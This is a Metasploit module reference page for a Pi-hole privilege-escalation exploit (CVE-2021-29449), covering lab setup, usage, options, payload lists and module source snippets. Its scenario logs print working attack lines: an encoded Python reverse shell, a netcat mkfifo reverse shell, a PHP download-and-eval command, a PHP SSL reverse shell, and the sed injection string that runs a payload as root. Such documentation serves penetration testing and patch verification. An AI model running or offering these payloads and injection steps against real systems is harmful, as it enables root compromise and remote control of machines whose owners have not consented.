Pi-Hole Remove Commands Linux Priv Esc - Metasploit
This page contains detailed information about how to use the exploit/linux/local/pihole_remove_commands_lpe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Pi-Hole Remove Commands Linux Priv Esc
Module: exploit/linux/local/pihole_remove_commands_lpe
Source code: modules/exploits/linux/local/pihole_remove_commands_lpe.rb
Disclosure date: 2021-04-20
Last modification time: 2022-05-04 15:03:34 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-29449
Pi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname, removecustomdns, and removestaticdhcp functions without properly validating the parameters before passing to sed. When executed as the www-data user, this allows for a privilege escalation to root since www-data is in the sudoers.d/pihole file with no password.
Module Ranking and Traits
Module Ranking:
- great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- config-changes: Module modifies some configuration setting on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions command.
msf > use exploit/linux/local/pihole_remove_commands_lpe
msf exploit(pihole_remove_commands_lpe) > show targets
... a list of targets ...
msf exploit(pihole_remove_commands_lpe) > set TARGET target-id
msf exploit(pihole_remove_commands_lpe) > show options
... show and set options ...
msf exploit(pihole_remove_commands_lpe) > set SESSION session-id
msf exploit(pihole_remove_commands_lpe) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Pi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname (5.1-5.2.4),
removecustomdns (5.0-5.2.4), and removestaticdhcp (3.0-5.2.4) functions without properly validating
the parameters before passing to sed. When executed as the www-data user,
this allows for a privilege escalation to root since www-data is in the
sudoers.d/pihole file with no password.
Install
More info at https://github.com/pi-hole/docker-pi-hole/
Docker v4.3
$ cat ~/docker-compose.yml
version: "3"
services:
pihole:
container_name: pihole
image: pihole/pihole:4.3
ports:
#- "53:53/tcp"
#- "53:53/udp"
#- "67:67/udp"
- "80:80/tcp"
environment:
TZ: 'America/Chicago'
WEBPASSWORD: ''
# Volumes store your data between container upgrades
volumes:
- './etc-pihole/:/etc/pihole/'
- './etc-dnsmasq.d/:/etc/dnsmasq.d/'
# Recommended but not required (DHCP needs NET_ADMIN)
# https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
cap_add:
- NET_ADMIN
restart: unless-stopped
Now exploit with unix/http/pihole_dhcp_mac_exec
Docker v5.0
$ cat ~/docker-compose.yml
version: "3"
services:
pihole:
container_name: pihole
image: pihole/pihole:v5.0
ports:
#- "53:53/tcp"
#- "53:53/udp"
#- "67:67/udp"
- "80:80/tcp"
environment:
TZ: 'America/Chicago'
WEBPASSWORD: ''
# Volumes store your data between container upgrades
volumes:
- './etc-pihole/:/etc/pihole/'
- './etc-dnsmasq.d/:/etc/dnsmasq.d/'
# Recommended but not required (DHCP needs NET_ADMIN)
# https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
cap_add:
- NET_ADMIN
restart: unless-stopped
Get a shell through console:
$ sudo docker-compose exec pihole /bin/bash
Switch to www-data user:
su - www-data -s /bin/bash
Now execute a payload to simulate the initial access.
Docker v5.1
$ cat ~/docker-compose.yml
version: "3"
services:
pihole:
container_name: pihole
image: pihole/pihole:v5.1
ports:
#- "53:53/tcp"
#- "53:53/udp"
#- "67:67/udp"
- "80:80/tcp"
environment:
TZ: 'America/Chicago'
WEBPASSWORD: ''
# Volumes store your data between container upgrades
volumes:
- './etc-pihole/:/etc/pihole/'
- './etc-dnsmasq.d/:/etc/dnsmasq.d/'
# Recommended but not required (DHCP needs NET_ADMIN)
# https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
cap_add:
- NET_ADMIN
restart: unless-stopped
Get a shell through console:
$ sudo docker-compose exec pihole /bin/bash
Switch to www-data user:
su - www-data -s /bin/bash
Now execute a payload to simulate the initial access.
Docker
Verification Steps
- Install the application
- Start msfconsole
- Get a session with
www-datapermissions - Do:
use exploit/linux/local/pihole_remove_commands_lpe - Do:
set session [#] - Do:
set target [NAME] - Do:
run - You should get a root shell.
Options
Target: DHCP
Exploits the removestaticdhcp command through /etc/dnsmasq.d/04-pihole-static-dhcp.conf file. Versions 3.0-5.2.4 are vulnerable.
This is the default.
Target: DNS
Exploits the removecustomdns command through /etc/pihole/custom.list file. Versions 5.0-5.2.4 are vulnerable.
Target: CNAME
Exploits the removecustomcname command through /etc/dnsmasq.d/05-pihole-custom-cname.conf file. Versions 5.1-5.2.4 are vulnerable.
Scenarios
Pi-hole version 4.3.2
Initial Session
[*] Processing pihole.rb for ERB directives.
resource (pihole.rb)> use unix/http/pihole_dhcp_mac_exec
[*] Using configured payload cmd/unix/reverse_netcat
resource (pihole.rb)> set payload payload/cmd/unix/reverse_python
payload => cmd/unix/reverse_python
resource (pihole.rb)> set rhosts 192.168.2.40
rhosts => 192.168.2.40
resource (pihole.rb)> set lhost 192.168.2.129
lhost => 192.168.2.129
resource (pihole.rb)> set verbose true
verbose => true
resource (pihole.rb)> exploit
[*] Started reverse TCP handler on 192.168.2.129:4444
[+] Version Detected: 4.3
[*] Using cookie: PHPSESSID=p2cnattrr0ffn51833141uaite;
[*] Using token: 3oEAhv+GdLt80vxFq4u5o4N8fYuq9DPonLg+ZO+QHo8=
[*] Validating path with MAC: 9F38D6019D1D
[+] System env path exploitable: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[*] Payload MAC will be: B0DA4A294E35
[*] Shellcode: B0DA4A294E35&&W=${PATH#/???/}&&P=${W%%?????:*}&&X=${PATH#/???/??}&&H=${X%%???:*}&&Z=${PATH#*:/??}&&R=${Z%%/*}&&$P$H$P$IFS-$R$IFS'EXEC(HEX2BIN("707974686f6e202d63202265786563285f5f696d706f72745f5f282762617365363427292e6236346465636f6465285f5f696d706f72745f5f2827636f6465637327292e676574656e636f64657228277574662d38272928276157317762334a3049484e765932746c644341674943776749434167494341676333566963484a765932567a6379416749437767494341674943416762334d67494341674f7941674943426f62334e30505349784f5449754d5459344c6a49754d54493549694167494341374943416749484276636e51394e4451304e434167494341374943416749484d396332396a613256304c6e4e765932746c6443687a62324e725a58517551555a6653553546564341674943776749434167494341676332396a613256304c6c4e5051307466553152535255464e4b534167494341374943416749484d7559323975626d566a6443676f6147397a644341674943776749434167494341676347397964436b7049434167494473674943416762334d755a4856774d69687a4c6d5a706247567562796770494341674c43416749434167494341774b53416749434137494341674947397a4c6d52316344496f6379356d6157786c626d386f4b5341674943776749434167494341674d536b67494341674f794167494342766379356b645841794b484d755a6d6c735a5735764b436b67494341734943416749434167494449704943416749447367494341676344317a64574a77636d396a5a584e7a4c6d4e686247776f4969396961573476596d467a6143497027295b305d292922"));'&&
[*] Sending Exploit
[*] Attempting to clean 9F38D6019D1D from config
[*] Attempting to clean B0DA4A294E35 from config
[*] Command shell session 1 opened (192.168.2.129:4444 -> 192.168.2.40:55430) at 2021-05-30 11:10:28 -0400
whoami
www-data
uname -a
Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N] y
Priv Esc
resource (pihole.rb)> use exploit/linux/local/pihole_remove_commands_lpe
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (pihole.rb)> set verbose true
verbose => true
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set session 1
session => 1
msf6 exploit(linux/local/pihole_remove_commands_lpe) > exploit
[+] mkfifo /tmp/lodcpa; nc 192.168.2.129 4444 0/tmp/lodcpa 2>&1; rm /tmp/lodcpa
[*] Started reverse TCP handler on 192.168.2.129:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Current user: www-data
[*] Pi-hole version: 4.3.2
[+] The target appears to be vulnerable. Pi-Hole 4.3.2 with user www-data is vulnerable and exploitable
[+] /etc/dnsmasq.d/04-pihole-static-dhcp.conf found!
[*] Executing payload against removestaticdhcp command
[*] Command shell session 2 opened (192.168.2.129:4444 -> 192.168.2.40:55466) at 2021-05-30 11:11:31 -0400
whoami
root
uname -a
Linux pihole 4.15.0-64-generic #73-Ubuntu SMP Thu Sep 12 13:16:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Pi-hole version 5.0
Initial Session
msf6 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 192.168.2.129:4444
[*] Using URL: http://0.0.0.0:8080/pmL2Ap
[*] Local IP: http://192.168.2.129:8080/pmL2Ap
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.2.129:8080/pmL2Ap', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
[*] 172.19.0.2 web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 172.19.0.2
[*] Meterpreter session 3 opened (192.168.2.129:4444 -> 172.19.0.2:55344) at 2021-05-30 11:46:31 -0400
Priv Esc
msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/pihole_remove_commands_lpe
[*] Using configured payload cmd/unix/reverse_php_ssl
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set target dns
target => dns
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set session 1
session => 1
msf6 exploit(linux/local/pihole_remove_commands_lpe) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter php/linux www-data (33) @ a5d63e5df67d 192.168.2.129:4444 -> 172.19.0.2:55344 (172.19.0.2)
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set session 3
session => 3
msf6 exploit(linux/local/pihole_remove_commands_lpe) > set target DNS
target => DNS
msf6 exploit(linux/local/pihole_remove_commands_lpe) > run
[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.2.129:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[!] SESSION may not be compatible with this module (unloadable Meterpreter extension: )
[*] Started reverse SSL handler on 192.168.2.129:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Current user: www-data
[*] Pi-hole version: 5.0
[+] The target appears to be vulnerable. Pi-Hole 5.0 with user www-data is vulnerable and exploitable
[+] /etc/pihole/custom.list found!
[*] Executing payload against removecustomdns command
[*] Command shell session 5 opened (192.168.2.129:4444 -> 172.19.0.2:55368) at 2021-05-30 11:54:30 -0400
whoami
root
uname -a
Linux a5d63e5df67d 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
Go back to menu.
Msfconsole Usage
Here is how the linux/local/pihole_remove_commands_lpe exploit module looks in the msfconsole:
msf6 > use exploit/linux/local/pihole_remove_commands_lpe
[*] Using configured payload cmd/unix/reverse_php_ssl
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show info
Name: Pi-Hole Remove Commands Linux Priv Esc
Module: exploit/linux/local/pihole_remove_commands_lpe
Platform: Unix, Linux
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2021-04-20
Provided by:
h00die
Emanuele Barbeno <[email protected]>
Module side effects:
config-changes
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 DHCP
1 DNS
2 CNAME
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload information:
Avoid: 1 characters
Description:
Pi-Hole versions 3.0 - 5.3 allows for command line input to the
removecustomcname, removecustomdns, and removestaticdhcp functions
without properly validating the parameters before passing to sed.
When executed as the www-data user, this allows for a privilege
escalation to root since www-data is in the sudoers.d/pihole file
with no password.
References:
https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj
https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt
https://nvd.nist.gov/vuln/detail/CVE-2021-29449
Module Options
This is a complete list of options available in the linux/local/pihole_remove_commands_lpe exploit:
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show options
Module options (exploit/linux/local/pihole_remove_commands_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (cmd/unix/reverse_php_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 DHCP
Advanced Options
Here is a complete list of advanced options supported by the linux/local/pihole_remove_commands_lpe exploit:
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show advanced
Module advanced options (exploit/linux/local/pihole_remove_commands_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ForceExploit false no Override check result
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (cmd/unix/reverse_php_ssl):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
HandlerSSLCert no Path to a SSL certificate in unified PEM format
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/local/pihole_remove_commands_lpe module can exploit:
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show targets
Exploit targets:
Id Name
-- ----
0 DHCP
1 DNS
2 CNAME
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/pihole_remove_commands_lpe exploit:
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
3 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
4 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
9 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
10 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
11 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
12 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
13 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
14 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
15 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
16 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
17 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
18 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
19 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
20 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
21 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
22 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
23 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
24 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
25 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
26 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
27 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
28 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
29 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
30 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
31 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
32 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
33 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
34 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
35 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
36 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
37 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
38 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
39 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
40 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
41 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
42 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
43 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
44 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
45 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
46 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
47 payload/generic/custom normal No Custom Payload
48 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
49 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the linux/local/pihole_remove_commands_lpe exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/local/pihole_remove_commands_lpe) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Pi-Hole version <V> is >= 5.3 and not vulnerable
Here is a relevant code snippet related to the "Pi-Hole version <V> is >= 5.3 and not vulnerable" error message:
76: w = whoami
77: print_status("Current user: #{w}")
78: v = pihole_version
79: print_status("Pi-hole version: #{v}")
80: unless v.between?(target['min'], Rex::Version.new('5.3'))
81: return CheckCode::Safe("Pi-Hole version #{v} is >= 5.3 and not vulnerable")
82: end
83: unless w == 'www-data'
84: return CheckCode::Safe("User must be www-data, currently #{w}")
85: end
86:
User must be www-data, currently <W>
Here is a relevant code snippet related to the "User must be www-data, currently <W>" error message:
79: print_status("Pi-hole version: #{v}")
80: unless v.between?(target['min'], Rex::Version.new('5.3'))
81: return CheckCode::Safe("Pi-Hole version #{v} is >= 5.3 and not vulnerable")
82: end
83: unless w == 'www-data'
84: return CheckCode::Safe("User must be www-data, currently #{w}")
85: end
86:
87: CheckCode::Appears("Pi-Hole #{v} with user #{w} is vulnerable and exploitable")
88: end
89:
Pi-Hole <V> with user <W> is vulnerable and exploitable
Here is a relevant code snippet related to the "Pi-Hole <V> with user <W> is vulnerable and exploitable" error message:
82: end
83: unless w == 'www-data'
84: return CheckCode::Safe("User must be www-data, currently #{w}")
85: end
86:
87: CheckCode::Appears("Pi-Hole #{v} with user #{w} is vulnerable and exploitable")
88: end
89:
90: def method_dhcp
91: f = '/etc/dnsmasq.d/04-pihole-static-dhcp.conf'
92: if !file?(f) || read_file(f).empty?
Config file not found: <F>
Here is a relevant code snippet related to the "Config file not found: <F>" error message:
94: ip = "10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}"
95: print_status("Adding static DHCP #{mac} #{ip}")
96: cmd_exec("#{sudo_pihole} addstaticdhcp '#{mac}' '#{ip}'")
97: end
98: unless file?(f)
99: print_error("Config file not found: #{f}")
100: return
101: end
102: print_good("#{f} found!")
103: print_status('Executing payload against removestaticdhcp command')
104: cmd_exec("#{sudo_pihole} removestaticdhcp 'a/d ; 1e #{payload.encoded} ; /'")
Config file not found: <F>
Here is a relevant code snippet related to the "Config file not found: <F>" error message:
114: ip = "10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}"
115: print_status("Adding DNS entry #{name} #{ip}")
116: cmd_exec("#{sudo_pihole} addcustomdns '#{ip}' '#{name}'")
117: end
118: unless file?(f)
119: print_error("Config file not found: #{f}")
120: return
121: end
122: print_good("#{f} found!")
123: print_status('Executing payload against removecustomdns command')
124: cmd_exec("#{sudo_pihole} removecustomdns 'a/d ; 1e #{payload.encoded} ; /'")
Config file not found: <F>
Here is a relevant code snippet related to the "Config file not found: <F>" error message:
133: name = "#{rand_text_alphanumeric(8..12)}.edu"
134: print_status("Adding CNAME entry #{name}")
135: cmd_exec("#{sudo_pihole} addcustomcname '#{name}' '#{name}'")
136: end
137: unless file?(f)
138: print_error("Config file not found: #{f}")
139: return
140: end
141: print_good("#{f} found!")
142: print_status('Executing payload against removecustomcname command')
143: cmd_exec("#{sudo_pihole} removecustomcname 'a/d ; 1e #{payload.encoded} ; /'")
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_filemethod - #15540 Merged Pull Request: Add option for running
cmd_executein a subshell - #15303 Merged Pull Request: Fix
dirmethod for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
- https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj
- https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt
- CVE-2021-29449
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/pihole_domains_api_exec
- exploit/unix/http/pihole_blocklist_exec
- exploit/unix/http/pihole_dhcp_mac_exec
- exploit/unix/http/pihole_whitelist_exec
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/local/zyxel_suid_cp_lpe
- exploit/osx/local/vmware_fusion_lpe
- exploit/unix/local/opensmtpd_oob_read_lpe
- exploit/windows/local/anyconnect_lpe
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- auxiliary/dos/windows/nat/nat_helper
- auxiliary/server/dns/spoofhelper
- exploit/linux/local/libuser_roothelper_priv_esc
- exploit/linux/local/ptrace_traceme_pkexec_helper
- exploit/linux/misc/mongod_native_helper
- exploit/windows/browser/ms13_090_cardspacesigninhelper
- exploit/windows/http/adobe_robohelper_authbypass
- exploit/windows/local/bypassuac_fodhelper
- exploit/windows/browser/mozilla_attribchildremoved
- auxiliary/sqli/oracle/lt_removeworkspace
- post/android/manage/remove_lock
- post/android/manage/remove_lock_root
- post/windows/manage/remove_ca
- post/windows/manage/remove_host
- post/linux/gather/enum_commands
- post/multi/recon/sudo_commands
Authors
- h00die
- Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
